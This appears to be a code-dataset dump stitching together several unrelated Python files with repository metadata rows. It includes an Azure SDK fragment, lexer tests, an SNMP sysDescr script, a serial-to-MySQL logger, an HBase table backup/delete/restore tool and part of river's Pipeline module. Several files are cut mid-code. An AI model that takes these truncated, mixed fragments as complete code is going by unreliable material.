header_parameters['Content-Type'] = 'application/json; charset=utf-8'
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct body
body_content = self._serialize.body(agreement_option, 'TopLevelDomainAgreementOption')
# Construct and send request
request = self._client.post(url, query_parameters)
response = self._client.send(
request, header_parameters, body_content, **operation_config)
if response.status_code not in [200]:
exp = CloudError(response)
exp.request_id = response.headers.get('x-ms-request-id')
raise exp
return response
# Deserialize response
deserialized = models.TldLegalAgreementPaged(internal_paging, self._deserialize.dependencies)
if raw:
header_dict = {}
client_raw_response = models.TldLegalAgreementPaged(internal_paging, self._deserialize.dependencies, header_dict)
return client_raw_response
return deserialized
| 42.780702
| 144
| 0.64107
|
57d4293119434933890062351231051c24898e74
| 3,038
|
py
|
Python
|
tests/test_lexer.py
|
rolandmueller/rita-dsl
|
d0457fcf220baaf7fa8f647bab36b5ff5ea9367b
|
[
"MIT"
] | 66
|
2019-07-17T05:23:04.000Z
|
2022-03-15T12:06:06.000Z
|
tests/test_lexer.py
|
rolandmueller/rita-dsl
|
d0457fcf220baaf7fa8f647bab36b5ff5ea9367b
|
[
"MIT"
] | 90
|
2019-07-18T10:21:13.000Z
|
2021-11-09T19:54:57.000Z
|
tests/test_lexer.py
|
rolandmueller/rita-dsl
|
d0457fcf220baaf7fa8f647bab36b5ff5ea9367b
|
[
"MIT"
] | 3
|
2020-08-20T06:57:11.000Z
|
2022-03-03T16:11:45.000Z
|
from rita.lexer import RitaLexer
def test_tokenize_any_macro_wo_args_wo_type():
lex = RitaLexer()
lex.build()
tokens = list(lex.tokenize("ANY"))
assert len(tokens) == 1
token = tokens[0]
assert token.type == "KEYWORD"
assert token.value == "ANY"
def test_tokenize_any_macro_wo_args_w_type():
lex = RitaLexer()
lex.build()
tokens = list(lex.tokenize('ANY -> MARK("Placeholder")'))
assert len(tokens) == 6
t0 = tokens[0]
assert t0.type == "KEYWORD"
assert t0.value == "ANY"
assert tokens[1].type == "ARROW"
t2 = tokens[2]
assert t2.type == "KEYWORD"
assert t2.value == "MARK"
t3 = tokens[4]
assert t3.type == "LITERAL"
assert t3.value == "Placeholder"
def test_tokenize_assign_literal():
lex = RitaLexer()
lex.build()
tokens = list(lex.tokenize('Test = "Test"'))
assert len(tokens) == 3
assert tokens[0].type == "NAME"
assert tokens[1].type == "ASSIGN"
assert tokens[2].type == "LITERAL"
def test_tokenize_assign_macro():
lex = RitaLexer()
lex.build()
tokens = list(lex.tokenize('Test = WORD("Test")'))
assert len(tokens) == 6
assert tokens[0].type == "NAME"
assert tokens[1].type == "ASSIGN"
assert tokens[2].type == "KEYWORD"
assert tokens[4].type == "LITERAL"
def test_tokenize_exec_macro():
lex = RitaLexer()
lex.build()
tokens = list(lex.tokenize('!IMPORT("module.test")'))
assert len(tokens) == 5
assert tokens[0].type == "EXEC"
assert tokens[1].type == "KEYWORD"
assert tokens[3].type == "LITERAL"
def test_tokenize_two_exec_macros():
lex = RitaLexer()
lex.build()
tokens = list(
lex.tokenize(
"""
!CONFIG("setting.1", "1")
!CONFIG("setting.2", "0")
"""
)
)
assert len(tokens) == 14
assert tokens[0].type == "EXEC"
assert tokens[1].type == "KEYWORD"
assert tokens[3].type == "LITERAL"
assert tokens[5].type == "LITERAL"
assert tokens[7].type == "EXEC"
assert tokens[8].type == "KEYWORD"
assert tokens[10].type == "LITERAL"
assert tokens[12].type == "LITERAL"
def test_tokenize_list_w_one_item():
lex = RitaLexer()
lex.build()
tokens = list(
lex.tokenize(
"""
members = { "first" }
"""
)
)
assert tokens[0].type == "NAME"
assert tokens[1].type == "ASSIGN"
assert tokens[3].type == "LITERAL"
def test_tokenize_variable_w_escape():
lex = RitaLexer()
lex.build()
tokens = list(
lex.tokenize(r'WORD("Hello \"World\"") -> MARK("GREETING")')
)
print(tokens[2])
assert tokens[0].type == "KEYWORD"
assert tokens[2].type == "LITERAL"
assert tokens[4].type == "ARROW"
assert tokens[5].type == "KEYWORD"
def test_pattern_in_variable():
lex = RitaLexer()
lex.build()
tokens = list(
lex.tokenize(r'COMPLEX_NUMBER = {NUM+, WORD("/")?, NUM}')
)
assert len(tokens) == 14
| 21.7
| 68
| 0.580645
|
ce628f6b73038d25734b518f198268fdc0f3418b
| 3,550
|
py
|
Python
|
src/sonic_ax_impl/bin/sysDescr_pass.py
|
RayWang910012/sonic-snmpagent
|
701ec1aba1b92f9d850c9227b9b1185b53ebad27
|
[
"Apache-2.0"
] | 13
|
2016-03-09T20:38:16.000Z
|
2021-02-04T17:39:27.000Z
|
src/sonic_ax_impl/bin/sysDescr_pass.py
|
RayWang910012/sonic-snmpagent
|
701ec1aba1b92f9d850c9227b9b1185b53ebad27
|
[
"Apache-2.0"
] | 167
|
2017-02-01T23:16:11.000Z
|
2022-03-31T02:22:08.000Z
|
src/sonic_ax_impl/bin/sysDescr_pass.py
|
xumia/sonic-snmpagent
|
4e063e4ade89943f2413a767f24564aecfa2cd1c
|
[
"Apache-2.0"
] | 89
|
2016-03-09T20:38:18.000Z
|
2022-03-09T09:16:13.000Z
|
#! /usr/bin/python3 -u
#################################################################################
# Copyright 2016 Cumulus Networks LLC, all rights reserved
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place - Suite 330, Boston,
# MA 02111-1307, USA.
#################################################################################
# This is a simple pass through script that
# returns only one OID, the Linux Distribution and Kernel Version
# as the systemDescription.
#
# To activate, you would need to place this
# script in /usr/share/snmp/sysDescr_pass.py
# and include this path along with the following
# in /etc/snmp/snmpd.conf (note the -p 10 to raise the priority)
# pass -p 10 .1.3.6.1.2.1.1.1 /usr/share/snmp/sysDescr_pass.py
#
# snmpd will call this script with either -g or -n and an OID
# This can be tested simply by calling the script
#
# ./sysDescr_pass.py -g .1.3.6.1.2.1.1.1.0
# ./sysDescr_pass.py -n .1.3.6.1.2.1.1.1
#
# should return meaningful information. Everything
# should return nothing.
#
# When tested on a recent Debian system, we get this:
#
# # snmpget -v2c -cpublic localhost .1.3.6.1.2.1.1.1
# SNMPv2-MIB::sysDescr.0 = STRING: Debian 8.4 (Linux Kernel 3.16.7-ckt25-1)
#
#
import sys
import logging
import traceback
# configure logging
logger = logging.getLogger(__name__)
logger.addHandler(logging.StreamHandler(sys.stdout))
logger.setLevel(logging.INFO)
# this is the one oid
myoid = '.1.3.6.1.2.1.1.1.0'
# and the version without the .0
myoidsub1 = '.1.3.6.1.2.1.1.1'
if len(sys.argv) < 3:
# we must be called with either -g or -n
# and an oid
sys.stdout.flush()
sys.exit()
command = sys.argv[1]
oid = sys.argv[2]
if command == '-n' and oid != myoidsub1:
# after our OID, there is nothing
sys.stdout.flush()
sys.exit()
elif command == '-s':
logger.error("set: oid not writeable")
sys.stdout.flush()
sys.exit()
elif command == '-g' and oid != myoid:
sys.stdout.flush()
sys.exit()
filepath = "/etc/ssw/sysDescription"
sysDescription = "SONiC (unknown version) - HwSku (unknown) - Distribution (unknown) - Kernel (unknown)"
try:
with open(filepath) as f:
lines = f.readlines()
sysDescription = lines[0]
except (OSError, IOError):
logger.exception("Unable to access file {}".format(filepath))
except IndexError:
logger.exception("unable to read lines from {}, possible empty file?".format(filepath))
except Exception:
logger.exception("Uncaught exception in {}".format(filepath))
logger.error(repr(traceback.extract_stack()))
# We simply have only have one object to print.
# we are passed a -g or -n for get or getnext
# snmpd will not call us with a get unless the oid
# is correct (the .0 on the end can be ignored).
# also, when called with a getnext, we checked the oid
# above so we know it is myoidsub1 for the getnext.
print("%s\nSTRING\n%s" % (myoid, sysDescription))
sys.stdout.flush()
| 31.696429
| 104
| 0.676056
|
8b0b587e6aac13144a399107fa63de1831d89c61
| 2,082
|
py
|
Python
|
client-app/client-app.py
|
realmoriss/grow4u
|
ac507ec3eeb376e2b89de0b9d031c69edf3d9195
|
[
"MIT"
] | null | null | null |
client-app/client-app.py
|
realmoriss/grow4u
|
ac507ec3eeb376e2b89de0b9d031c69edf3d9195
|
[
"MIT"
] | null | null | null |
client-app/client-app.py
|
realmoriss/grow4u
|
ac507ec3eeb376e2b89de0b9d031c69edf3d9195
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python3
import sys
import serial
import io
import datetime
import time
import pymysql
def readCmd(sio: io.TextIOWrapper, cmd: str):
dt_out = sio.write(cmd + "\n")
sio.flush()
if dt_out==0:
raise Exception("Unable to write to device.")
if sio.readline().strip()!=cmd:
raise Exception("Device is not responding.")
return sio.readline().strip()
def main():
db_host = ""
db_user = ""
db_pass = ""
db_name = ""
db_charset = "utf8mb4"
db = pymysql.connect(host=db_host, user=db_user, password=db_pass,
db=db_name, charset=db_charset, cursorclass=pymysql.cursors.DictCursor)
try:
ser = serial.Serial(port="/dev/ttyACM0", baudrate=38400, timeout=1)
except Exception as e:
print("Unable to connect to serial port: " + str(e))
sys.exit(1)
ser.flushInput()
ser.flushOutput()
try:
# The buffer size should be set to 1 for both BufferedRWPair and TextIOWrapper
# see issue: https://stackoverflow.com/a/27894482
sio = io.TextIOWrapper(io.BufferedRWPair(ser, ser, 1), encoding="ascii")
sio._CHUNK_SIZE = 1
print("Started logging...")
with db.cursor() as cursor:
create_table_cmd = "CREATE TABLE IF NOT EXISTS `sensor_log` (`id` INT NOT NULL AUTO_INCREMENT, `date` DATETIME, `temp` FLOAT, `hum` FLOAT, `soil` FLOAT, PRIMARY KEY (`id`))"
cursor.execute(create_table_cmd)
db.commit()
with db.cursor() as cursor:
insert_cmd = "INSERT INTO `sensor_log` (`date`, `temp`, `hum`, `soil`) VALUES (%s, %s, %s, %s)"
while True:
cursor.execute(insert_cmd, (datetime.datetime.now().isoformat(), readCmd(sio, "temp"), readCmd(sio, "hum"), readCmd(sio, "soil")))
db.commit()
time.sleep(10)
except Exception as e:
print("Error while communicating: " + str(e))
except KeyboardInterrupt:
print("Bye.")
finally:
db.close()
if __name__ == "__main__":
main()
| 31.545455
| 185
| 0.604227
|
b4c564c286d735c965066d58ac400b21841dba54
| 1,600
|
py
|
Python
|
_GTW/_OMP/_DNS/UI_Spec.py
|
Tapyr/tapyr
|
4235fba6dce169fe747cce4d17d88dcf4a3f9f1d
|
[
"BSD-3-Clause"
] | 6
|
2016-12-10T17:51:10.000Z
|
2021-10-11T07:51:48.000Z
|
_GTW/_OMP/_DNS/UI_Spec.py
|
Tapyr/tapyr
|
4235fba6dce169fe747cce4d17d88dcf4a3f9f1d
|
[
"BSD-3-Clause"
] | null | null | null |
_GTW/_OMP/_DNS/UI_Spec.py
|
Tapyr/tapyr
|
4235fba6dce169fe747cce4d17d88dcf4a3f9f1d
|
[
"BSD-3-Clause"
] | 3
|
2020-03-29T07:37:03.000Z
|
2021-01-21T16:08:40.000Z
|
# -*- coding: utf-8 -*-
# Copyright (C) 2012-2015 Dr. Ralf Schlatterbeck All rights reserved
# Reichergasse 131, A-3411 Weidling, Austria. rsc@runtux.com
# ****************************************************************************
# This module is part of the package GTW.OMP.DNS.
#
# This module is licensed under the terms of the BSD 3-Clause License
# <http://www.c-tanzer.at/license/bsd_3c.html>.
# ****************************************************************************
#
#++
# Name
# GTW.OMP.DNS.UI_Spec
#
# Purpose
# UI specification for E_Types defined by GTW.OMP.DNS
#
# Revision Dates
# 6-Sep-2012 (RS) Creation
# 16-Dec-2015 (CT) Change to `UI_Spec`
# ««revision-date»»···
#--
from _GTW import GTW
from _TFL import TFL
import _GTW._OMP._DNS
import _TFL.Sorted_By
class UI_Spec (object) :
"""UI specification for E_Types defined by GTW.OMP.DNS"""
AAAA_Record = dict \
(
)
A_Record = dict \
(
)
CNAME_Record = dict \
(
)
MX_Record = dict \
(
)
NS_Record = dict \
(
)
Secondary_IP4 = dict \
(
)
Secondary_IP6 = dict \
(
)
SRV_Record = dict \
(
)
TXT_Record = dict \
(
)
Zone = dict \
(
)
# end class UI_Spec
if __name__ != "__main__" :
GTW.OMP.DNS._Export ("UI_Spec")
### __END__ GTW.OMP.DNS.UI_Spec
| 20.253165
| 78
| 0.453125
|
9d8fe33d2697e6d6b12b4601e6c6a486454a5264
| 1,438
|
py
|
Python
|
tests/test_005_add_items_to_list.py
|
Sudipta96/AnyDo-Web-UI-Automation
|
207aa3240a0bbdb6839e43c470258597efd95e44
|
[
"MIT"
] | null | null | null |
tests/test_005_add_items_to_list.py
|
Sudipta96/AnyDo-Web-UI-Automation
|
207aa3240a0bbdb6839e43c470258597efd95e44
|
[
"MIT"
] | null | null | null |
tests/test_005_add_items_to_list.py
|
Sudipta96/AnyDo-Web-UI-Automation
|
207aa3240a0bbdb6839e43c470258597efd95e44
|
[
"MIT"
] | null | null | null |
from tests.base_test import BaseTest
from configurations.config import TestData, Test_Data_005
from pages.login_page import LoginPage
from pages.add_items_to_list import AddItemsToListPage
from utils.customLogger import LogGeneration
import time
class Test_005_AddItemsToList(BaseTest):
username = TestData.username
password = TestData.password
listname = Test_Data_005.listname
list_items = Test_Data_005.list_items
logger= LogGeneration.loggen()
def test_add_items_to_list(self):
self.logger.info("*****Add Items To List Test******")
self.logger.info("****Login process initializing ****")
self.lp=LoginPage(self.driver)
self.lp.login(self.username, self.password)
self.logger.info("****Login successfull ****")
time.sleep(5)
self.logger.info("****Started Adding Items to List******")
self.obj = AddItemsToListPage(self.driver)
self.obj.collapse_list_menu()
time.sleep(3)
self.obj.click_list_item()
self.obj.enter_taskname(self.list_items)
items_visibility = self.obj.check_items_visibility(self.list_items)
if items_visibility == True:
self.logger.info("****Adding Items to List passed******")
assert True
else:
self.logger.info("****Adding Items to List failed******")
assert False
| 29.958333
| 75
| 0.648122
|
0d9387ad5e0500460f0d58ba5a6bf478bbb8934d
| 9,850
|
py
|
Python
|
hbase_script.py
|
abhishekzgithub/hbase
|
05aad6188a42c897ef38b5a56c85b1bb0725de3a
|
[
"MIT"
] | null | null | null |
hbase_script.py
|
abhishekzgithub/hbase
|
05aad6188a42c897ef38b5a56c85b1bb0725de3a
|
[
"MIT"
] | null | null | null |
hbase_script.py
|
abhishekzgithub/hbase
|
05aad6188a42c897ef38b5a56c85b1bb0725de3a
|
[
"MIT"
] | null | null | null |
import happybase
import pandas as pd
import os,time
import datetime
timenow=datetime.datetime.now().strftime("%y-%m-%d-%H-%M")
hbaseip = input("Please provide the IP ADDRESS of the hbase==-->")
namespace = input("NAMESPACE of the hbase==-->")
encoding = 'utf-8'
filepath=os.getcwd()
filename=namespace+"_data.xlsx"
def convert_scan_data_to_list(h_data, is_col_family_included=False):
"""
Converts hbase data to list of dictionaries
:param h_data: Object returned from table.scan function
:param is_col_family_included: Flag for adding column family in returned data
:return: List
"""
temp_list = []
try:
for row_key, vals in h_data:
value_dict = {}
key_name = (row_key.decode(encoding), vals)[0]
key_vals = (row_key.decode(encoding), vals)[1]
value_dict['row_key'] = key_name
for keys, items in key_vals.items():
if is_col_family_included:
names = keys
else:
names = keys.decode(encoding).split(':')[1]
value_dict[names] = items.decode(encoding)
temp_list.append(value_dict)
except Exception as e:
print(e)
return temp_list
def convert_scan_data_to_df(h_data, is_col_family_included=False):
"""
Converts hbase data to DataFrame
:param h_data: Object returned from table.scan function
:param is_col_family_included: Flag for adding column family in returned data
:return: DataFrame
"""
temp_list = convert_scan_data_to_list(h_data, is_col_family_included)
df = pd.DataFrame(temp_list)
return df
def get_table_details(table_name=None, filter1=None, col=None, del_data=False, df_conv=False):
conn = happybase.Connection(hbaseip, table_prefix=namespace, table_prefix_separator=":",
autoconnect=False)
conn.open()
table_data = conn.table(table_name)
data = table_data.scan(columns=col, filter=filter1)
if df_conv == True:
df = convert_scan_data_to_df(data,is_col_family_included=True)
if conn:
conn.close()
return df
def get_all_table_list(local_list=False):
conn = happybase.Connection(hbaseip, table_prefix=namespace, table_prefix_separator=":",
autoconnect=False)
conn.open()
if local_list:
table_list_all=tab_list_ccpa
else:
table_list_all = [i.decode('utf-8') for i in conn.tables()]
if conn:
conn.close()
return table_list_all
def get_all_data(backup=False):
try:
print("saving data started")
dfc = {}
if backup:
writer = pd.ExcelWriter(filepath+r"\\"+"bk_"+timenow+"_"+filename)
else:
writer = pd.ExcelWriter(filepath+r"\\"+filename,engine='openpyxl')
table_list_all=get_all_table_list()
for i in range(len(table_list_all)):
dfc[i] = get_table_details(df_conv=True,
table_name=table_list_all[i])
dfc[i].to_excel(writer, sheet_name=table_list_all[i], index=False,encoding=encoding)
writer.save()
except Exception as e:
print("exception in get all data",e)
finally:
print("excel file {0} is saved in below location\n {1} ".format(filename,filepath))
class HbaseOperation(object):
def __init__(self,tablename=None):
self.tab=tablename
self.conn = happybase.Connection(hbaseip, table_prefix=namespace, table_prefix_separator=":",
autoconnect=False)
self.conn.open()
get_all_data(backup=True)
def _create_hbasetable(self):
"""
# tablename='mytable1'
# colfam={'cf1': dict()}
# dict_name_family={tablename:colfam}
#(create_hbasetable(dict_name_family))
:param dict_name_family:
:return:
"""
print("creation of tables started")
if self.tab == None:
for i in range(len(tab_cf)):
for table_name,colfam in tab_cf[i].items():
print("Table {0} is created".format(table_name))
try:
self.conn.create_table(name=table_name,families=colfam)
except Exception as e:
continue
else:
fam=[val for i in range(len(tab_cf)) for key, val in tab_cf[i].items() if key == self.tab][0]
print("Table {0} is created".format(self.tab))
self.conn.create_table(name=self.tab, families=fam)
print("creation of tables ended")
#self.conn.close()
def _delete_hbasetable(self,local_list=False):
print("deletion of tables started")
tablename_list=get_all_table_list(local_list=local_list)
#if True:#eval(input("Press '1234567' to delete all data\n"))==1234567:
if self.tab == None:
for i in tablename_list:
print(("table {0} deleted").format(i))
try:
self.conn.delete_table(name=i,disable=True)
except Exception as e:
continue
else:
self.conn.delete_table(name=self.tab, disable=True)
print(("table {0} deleted").format(self.tab))
#self.conn.close()
flag = False
print("deletion of tables ended")
def _delete_keydata_hbase(self):
"""safe delete"""
if self.tab!=None:
print("updating the {} table".format(self.tab))
table_data=self.conn.table(self.tab)
data=table_data.scan()
for key, val in data:
if key:
table_data.delete(key)
else:
raise SystemError("a table input is required for this operation")
def insert_data(self):
print("insertion of data in tables started")
if not os.path.exists(filepath+r'\\'+filename):
raise ValueError(("file {0} doesnt exist in the path {1}").format(filename,filepath))
else:
file=filepath+r'\\'+filename
if self.tab == None:
sheet_list = pd.ExcelFile(file).sheet_names
for i in range(len(sheet_list)):
print("Table {0} is being inserted ".format(sheet_list[i]))
table = self.conn.table(sheet_list[i])
df = pd.read_excel(file, sheet_name=sheet_list[i])
df_rowkey = df['row_key'].astype('str')
df_data = df.drop(['row_key'], axis=1).astype('str')
with table.batch(transaction=True) as b:
for x in range(df.shape[0]):
rk = df_rowkey.iloc[x]
data = df_data.iloc[x, :].to_dict()
b.put(rk, data)
else:
sheet_list=self.tab
print("Table {0} is being inserted ".format(sheet_list))
table = self.conn.table(sheet_list)
df = pd.read_excel(file, sheet_name=sheet_list)
df_rowkey = df['row_key'].astype('str')
df_data = df.drop(['row_key'], axis=1).astype('str')
with table.batch(transaction=True) as b:
for x in range(df.shape[0]):
rk = df_rowkey.iloc[x]
data = df_data.iloc[x, :].to_dict()
b.put(rk, data)
#self.conn.close()
time.sleep(2)
get_all_data(backup=False)
print("insertion of data in tables ended")
def get_cf_table(self):
sheet_list = pd.ExcelFile(filename).sheet_names
dict_name_family = dict()
for i in range(len(sheet_list)):
table = self.conn.table(sheet_list[i])
fam=table.families()
cf=[k for k in fam.keys()][0].decode('utf-8')
dict_name_family[i]={
sheet_list[i]:{
cf:dict()
}
}
self.conn.close()
#print(list(dict_name_family.values()))
if __name__ == "__main__":
while True:
var=int(input("Press 1 to create backup of data\n"
"Press 2 to download data which will be later used for upload after edit\n"
"Press 3 to upload the appended data. A default backup of previous data will be saved.\n"
"Press 4 to completely update the data from the excel\n"
"Press 5 to update specific table/sheet\n"
"Press 6 for safe update(time taking)\n"
"Press 10 to exit this loop\n--->"))
if var == 10:
raise SystemExit("You pressed 10 to exit")
elif var == 1:
get_all_data(backup=True)
elif var == 2:
get_all_data(backup=False)
elif var == 3:
hbo = HbaseOperation()
hbo.insert_data()
time.sleep(4)
get_all_data()
elif var == 4:
hbo = HbaseOperation()
hbo._delete_hbasetable()
time.sleep(4)
hbo1=HbaseOperation()
hbo1._create_hbasetable()
hbo2=HbaseOperation()
hbo2.insert_data()
elif var == 5:
tabname=str(input("Please enter the sheet/table name for update\n-->"))
hbo=HbaseOperation(tabname)
hbo._delete_hbasetable()
time.sleep(2)
hbo._create_hbasetable()
hbo.insert_data()
elif var == 6:
tabname = str(input("Please enter the sheet/table name for update\n-->"))
hbo = HbaseOperation(tabname)
hbo._delete_keydata_hbase()
time.sleep(2)
hbo.insert_data()
| 38.779528
| 107
| 0.564264
|
de4c2ae95fa21dae4aa25c0e57b59bf17c34e470
| 2,580
|
py
|
Python
|
app/core/models.py
|
nimkh1987/recipe-app-api
|
5347379095dc917023e7d1e2a5444c00075591d8
|
[
"MIT"
] | null | null | null |
app/core/models.py
|
nimkh1987/recipe-app-api
|
5347379095dc917023e7d1e2a5444c00075591d8
|
[
"MIT"
] | null | null | null |
app/core/models.py
|
nimkh1987/recipe-app-api
|
5347379095dc917023e7d1e2a5444c00075591d8
|
[
"MIT"
] | null | null | null |
import uuid
import os
from django.db import models
from django.contrib.auth.models import AbstractBaseUser, \
BaseUserManager, PermissionsMixin
from django.conf import settings
def recipe_image_file_path(instance, filename):
"""Generate file path for new recipe image"""
ext = filename.split('.')[-1]
filename = f'{uuid.uuid4()}.{ext}'
return os.path.join('uploads/recipe/', filename)
class UserManager(BaseUserManager):
def create_user(self, email, password=None, **extra_fields):
"""Creates and saves a new user"""
if not email:
raise ValueError('User must have an email address')
user = self.model(email=self.normalize_email(email), **extra_fields)
user.set_password(password)
user.save(using=self._db)
return user
def create_superuser(self, email, password):
"""Creates and saves a new superuser"""
user = self.create_user(email, password)
user.is_staff = True
user.is_superuser = True
user.save(using=self._db)
return user
class User(AbstractBaseUser, PermissionsMixin):
"""Custom user model that supports using email instead of username"""
email = models.EmailField(max_length=255, unique=True)
name = models.CharField(max_length=255)
is_active = models.BooleanField(default=True)
is_staff = models.BooleanField(default=False)
objects = UserManager()
USERNAME_FIELD = 'email'
class Tag(models.Model):
"""Tag to be used with recipe"""
name = models.CharField(max_length=255)
user = models.ForeignKey(
settings.AUTH_USER_MODEL,
on_delete=models.CASCADE,
)
def __str__(self):
return self.name
class Ingredient(models.Model):
"""INgredients to be used in a recipe"""
name = models.CharField(max_length=255)
user = models.ForeignKey(
settings.AUTH_USER_MODEL,
on_delete=models.CASCADE,
)
def __str__(self):
return self.name
class Recipe(models.Model):
"""Recipe object"""
user = models.ForeignKey(
settings.AUTH_USER_MODEL,
on_delete=models.CASCADE
)
title = models.CharField(max_length=255)
time_minutes = models.IntegerField()
price = models.DecimalField(max_digits=5, decimal_places=2)
link = models.CharField(max_length=255, blank=True)
ingredients = models.ManyToManyField('Ingredient')
tags = models.ManyToManyField('Tag')
image = models.ImageField(null=True, upload_to=recipe_image_file_path)
def __str__(self):
return self.title
| 28.351648
| 76
| 0.682171
|
45a47899246694816554ef65ba2b7453737665cf
| 63
|
py
|
Python
|
hello.py
|
sabbate/cs3240-labdemo
|
d4e9a57eb494b028eff1c0400a54d2ac65785bd7
|
[
"MIT"
] | null | null | null |
hello.py
|
sabbate/cs3240-labdemo
|
d4e9a57eb494b028eff1c0400a54d2ac65785bd7
|
[
"MIT"
] | null | null | null |
hello.py
|
sabbate/cs3240-labdemo
|
d4e9a57eb494b028eff1c0400a54d2ac65785bd7
|
[
"MIT"
] | null | null | null |
from helper import greeting
greeting("Hello from hello.py");
| 21
| 32
| 0.761905
|
202b5616ed8fda6092551f20607f9b7606a81173
| 25,306
|
py
|
Python
|
river/compose/pipeline.py
|
dataJSA/river
|
93497bba53d11d21e862acfd656b3fba7cf05c9b
|
[
"BSD-3-Clause"
] | null | null | null |
river/compose/pipeline.py
|
dataJSA/river
|
93497bba53d11d21e862acfd656b3fba7cf05c9b
|
[
"BSD-3-Clause"
] | null | null | null |
river/compose/pipeline.py
|
dataJSA/river
|
93497bba53d11d21e862acfd656b3fba7cf05c9b
|
[
"BSD-3-Clause"
] | null | null | null |
import collections
import contextlib
import functools
import io
import itertools
import types
import typing
from xml.etree import ElementTree as ET
import pandas as pd
from river import base, utils
from . import func, union
__all__ = ["Pipeline"]
@contextlib.contextmanager
def warm_up_mode():
"""A context manager for training pipelines during a warm-up phase.
You don't have to worry about anything when you call `predict_one` and `learn_one` with a
pipeline during in a training loop. The methods at each step of the pipeline will be called in
the correct order.
However, during a warm-up phase, you might just be calling `learn_one` because you don't need
the out-of-sample predictions. In this case the unsupervised estimators in the pipeline won't
be updated, because they are usually updated when `predict_one` is called.
This context manager allows you to override that behavior and make it so that unsupervised
estimators are updated when `learn_one` is called.
Examples
--------
Let's first see what methods are called if we just call `learn_one`.
>>> import io
>>> import logging
>>> from river import anomaly
>>> from river import compose
>>> from river import datasets
>>> from river import preprocessing
>>> from river import utils
>>> model = compose.Pipeline(
... preprocessing.MinMaxScaler(),
... anomaly.HalfSpaceTrees()
... )
>>> class_condition = lambda x: x.__class__.__name__ in ('MinMaxScaler', 'HalfSpaceTrees')
>>> logger = logging.getLogger()
>>> logger.setLevel(logging.DEBUG)
>>> logs = io.StringIO()
>>> sh = logging.StreamHandler(logs)
>>> sh.setLevel(logging.DEBUG)
>>> logger.addHandler(sh)
>>> with utils.log_method_calls(class_condition):
... for x, y in datasets.CreditCard().take(1):
... model = model.learn_one(x)
>>> print(logs.getvalue())
MinMaxScaler.transform_one
HalfSpaceTrees.learn_one
Now let's use the context manager and see what methods get called.
>>> logs = io.StringIO()
>>> sh = logging.StreamHandler(logs)
>>> sh.setLevel(logging.DEBUG)
>>> logger.addHandler(sh)
>>> with utils.log_method_calls(class_condition), utils.warm_up_mode():
... for x, y in datasets.CreditCard().take(1):
... model = model.learn_one(x)
>>> print(logs.getvalue())
MinMaxScaler.learn_one
MinMaxScaler.transform_one
HalfSpaceTrees.learn_one
We can see that the scaler got updated before transforming the data.
"""
Pipeline._WARM_UP = True
try:
yield
finally:
Pipeline._WARM_UP = False
@contextlib.contextmanager
def pure_inference_mode():
"""A context manager for making inferences with no side-effects.
Calling `predict_one` with a pipeline will update the unsupervised steps of the pipeline. This
is the expected behavior for online machine learning. However, in some cases you might just
want to produce predictions without necessarily updating anything.
This context manager allows you to override that behavior and make it so that unsupervised
estimators are not updated when `predict_one` is called.
Examples
--------
Let's first see what methods are called if we just call `predict_one`.
>>> import io
>>> import logging
>>> from river import compose
>>> from river import datasets
>>> from river import linear_model
>>> from river import preprocessing
>>> from river import utils
>>> model = compose.Pipeline(
... preprocessing.StandardScaler(),
... linear_model.LinearRegression()
... )
>>> class_condition = lambda x: x.__class__.__name__ in ('StandardScaler', 'LinearRegression')
>>> logger = logging.getLogger()
>>> logger.setLevel(logging.DEBUG)
>>> logs = io.StringIO()
>>> sh = logging.StreamHandler(logs)
>>> sh.setLevel(logging.DEBUG)
>>> logger.addHandler(sh)
>>> with utils.log_method_calls(class_condition):
... for x, y in datasets.TrumpApproval().take(1):
... _ = model.predict_one(x)
>>> print(logs.getvalue())
StandardScaler.learn_one
StandardScaler.transform_one
LinearRegression.predict_one
Now let's use the context manager and see what methods get called.
>>> logs = io.StringIO()
>>> sh = logging.StreamHandler(logs)
>>> sh.setLevel(logging.DEBUG)
>>> logger.addHandler(sh)
>>> with utils.log_method_calls(class_condition), utils.pure_inference_mode():
... for x, y in datasets.TrumpApproval().take(1):
... _ = model.predict_one(x)
>>> print(logs.getvalue())
StandardScaler.transform_one
LinearRegression.predict_one
We can see that the scaler did not get updated before transforming the data.
"""
Pipeline._STATELESS = True
try:
yield
finally:
Pipeline._STATELESS = False
class Pipeline(base.Estimator):
"""A pipeline of estimators.
Pipelines allow you to chain different steps into a sequence. Typically, when doing supervised
learning, a pipeline contains one ore more transformation steps, whilst it's is a regressor or
a classifier. It is highly recommended to use pipelines with `river`. Indeed, in an online
learning setting, it is very practical to have a model defined as a single object. Take a look
at the [user guide](../../recipes/pipelines.md) for further information and
practical examples.
One special thing to take notice to is the way transformers are handled. It is usual to predict
something for a sample and wait for the ground truth to arrive. In such a scenario, the
features are seen before the ground truth arrives. Therefore, the unsupervised parts of the
pipeline are updated when `predict_one` and `predict_proba_one` are called. Usually the
unsupervised parts of the pipeline are all the steps that precede the final step, which is a
supervised model. However, some transformers are supervised and are therefore also updated
during calls to `learn_one`.
Parameters
----------
steps
Ideally, a list of (name, estimator) tuples. A name is automatically inferred if none is
provided.
Examples
--------
The recommended way to declare a pipeline is to use the `|` operator. The latter allows you
to chain estimators in a very terse manner:
>>> from river import linear_model
>>> from river import preprocessing
>>> scaler = preprocessing.StandardScaler()
>>> log_reg = linear_model.LinearRegression()
>>> model = scaler | log_reg
This results in a pipeline that stores each step inside a dictionary.
>>> model
Pipeline (
StandardScaler (
with_std=True
),
LinearRegression (
optimizer=SGD (
lr=Constant (
learning_rate=0.01
)
)
loss=Squared ()
l2=0.
l1=0.
intercept_init=0.
intercept_lr=Constant (
learning_rate=0.01
)
clip_gradient=1e+12
initializer=Zeros ()
)
)
You can access parts of a pipeline in the same manner as a dictionary:
>>> model['LinearRegression']
LinearRegression (
optimizer=SGD (
lr=Constant (
learning_rate=0.01
)
